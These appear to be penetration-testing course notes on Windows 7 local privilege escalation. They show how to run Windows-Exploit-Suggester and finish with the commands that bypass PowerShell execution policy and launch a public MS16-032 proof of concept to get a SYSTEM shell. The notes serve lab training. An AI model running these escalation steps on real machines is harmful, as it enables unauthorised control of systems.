Windows Desktop
- Windows 7 was made end-of-life on January 14, 2020, but is still in use in many environments.
Windows 7 Case Study
- Using - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
- If installation issues
Install Python Dependencies (local VM only)
-
This tool works on the Pwnbox, but to get it working on a local version of Parrot, we need to do the following to install the necessary dependencies.
$ sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz $ sudo tar -xf setuptools-2.0.tar.gz $ cd setuptools-2.0/ $ sudo python2.7 setup.py install $ sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz $ sudo tar -xf xlrd-1.0.0.tar.gz $ cd xlrd-1.0.0/ $ sudo python2.7 setup.py install` -
Gathering Systeminfo Command Output
systeminfo
- Updating the Local Microsoft Vulnerability Database
sudo python2.7 windows-exploit-suggester.py --update
- Running the Windows Exploit Suggester
python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt
- If we have a meterpreter shell as in previous exercise, we can use this local exploit suggester - https://www.rapid7.com/blog/post/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
- MS16-032 - https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
- Exploiting MS16-032 with PowerShell PoC
- use PoC - https://www.exploit-db.com/exploits/39719
Set-ExecutionPolicy bypass -scope processImport-Module .\Invoke-MS16-032.ps1Invoke-MS16-032- This works and we spawn a SYSTEM cmd console.